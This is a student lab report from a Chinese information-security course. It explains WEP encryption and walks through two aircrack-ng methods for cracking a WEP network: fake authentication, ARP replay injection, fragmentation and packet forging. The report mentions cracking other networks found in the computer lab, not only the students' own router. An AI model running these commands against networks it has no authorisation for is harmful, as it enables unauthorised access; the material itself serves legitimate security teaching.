无线网络安全实验
- 格式:doc
- 大小:403.50 KB
- 文档页数:11
实验报告
课程名称《信息系统安全技术及应用》实验项目《无线网络安全性研究与实践》实验仪器PC机、因特网
系别信息管理学院
专业信息安全
班级__________________
组长姓名 ________________
组员姓名_ _
_ ___ ____
实验日期 2013-
成绩 _______________________
指导教师刘晓梅
北京信息科技大学信息管理学院
数据
CRC-32算法
数据CRC值
数据+CRC值
加密好数据后,IV会附加到数据上,同时用一个数据位(比特)来表示数据包已被加密。然后,所有信息广播到空中,由接受方捕捉和解密。
解密过程是对加密过程的一个逆转。首先,从数据包中移除IV,并将其与共享密钥合并在一起。然后,合并后的值用于重新创建KSA,后者进而用于创建密钥流(Keystream),密钥流与加密的数据包进行XOR 运算,便得到明文输出。然后,从明文中移除校验和(CRC),并将它与重新计算后所得的CRC进行比较,随后确定对这个数据包的取舍。
2.实验准备(实验环境的搭建、实验仪器的准备等):
本次实验主要涉及了2个实验环境:
一:宿舍的实验环境:为了方便研究无线破解的技术和原理,从安协拿回了无线路由器,在宿舍搭建了一个由TP-LINK 54MB的无线路由组成的用WEB-64比特加密方式加密的无线局域网。
二:机房的实验环境:机房的实验环境不需要自己搭建,有很多现成的无线信号可以供破解,也没有实验仪器需要准备。
3.实验步骤(详细写出实验步骤):
实验准备阶段:
(1)实验装备用具:华硕A8JS(内置Intel3945 无线网卡)配备BT3 U盘操作系统。
IBM T60(内置Intel3945 无线网卡)配备BT3 硬盘操作系统。
(2)调试各种BT3操作系统,使在BT3下能够上网浏览网页,浏览文档,辅助在BT3下的破解工作,且可以正常运行进行破解工作。
实验破解阶段:
(1)在BT3操作系统下:
一种方法:
1.开机运行BT3操作系统,打开一个SHELL命令框,开始输入命令:modprobe –r
iwl3945卸载3945网卡的原驱动,再输入命令:modprobe ipwraw 装载支持监听模式的新驱动。
2.输入命令:airodump-ng wifi0 开始扫描所有的无线信号,以选择破解的目标。
3.输入命令:macchanger –m <本机MAC地址> wifi0 来改变自己网卡的MAC地址,
确保相同。
此步可有可无。故无截图,在此只是点名此步骤。
4.输入命令:airmon-ng start wifi0 6 激活网卡的监听模式并且工作在wifi0所在的第6
频
5.输入命令:airodump-ng -w capture -c 6 –bssid <所要破解的AP的MAC地址> wifi0
开始按照物理地址和频道所对应的无线信号抓包,并且把所抓到的数据包存
为名字capture的文件。
6.输入命令:aireplay-ng -1 0 -e <所要破解的AP的Essid> -a <所要破解的AP的物理地址>
wifi0
利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻
击,伪造和所要破解AP的伪装连接,为后面的攻击打下基础。
7.输入命令:aireplay-ng -3 –b <所要破解的AP的物理地址> wifi0
利用BT3操作系统自带的arp 注入攻击模式的-3 模式通过不断向AP 发
送同样的arp请求包,来进行注入式攻击,以便获得大量的有效数据。攻击
成功后数据包飞涨。
另一种方法:
1.开机运行BT3操作系统,打开一个SHELL命令框,开始输入命令:modprobe –r
iwl3945卸载3945网卡的原驱动,再输入命令:modprobe ipwraw 装载支持监听模式的新驱动。
2.输入命令:airodump-ng wifi0 开始扫描所有的无线信号,以选择破解的目标。
3.输入命令:macchanger –m <本机MAC地址> wifi0 来改变自己网卡的MAC地址,
确保相同。
此步可有可无。故无截图,在此只是点名此步骤。
4.输入命令:airmon-ng start wifi0 6 激活网卡的监听模式并且工作在wifi0所在的第6
频道。
5.输入命令:airodump-ng -w capture -c 6 –bssid <所要破解的AP的MAC地址> wifi0
开始按照物理地址和频道所对应的无线信号抓包,并且把所抓到的数据包存
为名字是capture的文件。
6.输入命令:aireplay-ng -1 0 -e <所要破解的AP的Essid> -a <所要破解的AP的物理地址>
wifi0
利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻
击,伪造和所要破解AP的伪装连接,为后面的攻击打下基础。
7.输入命令:airreplay-ng -5 –b 001478e51610 wifi0
采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。
8.输入命令:packetforge-ng -0 -a
255.255.255.255 –y fragment-0108-231739.xor -w myarp
用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。
9.输入命令:aireplay-ng -2 –r myarp -x 512 wifi0
采用交互模式-2,发包注入攻击。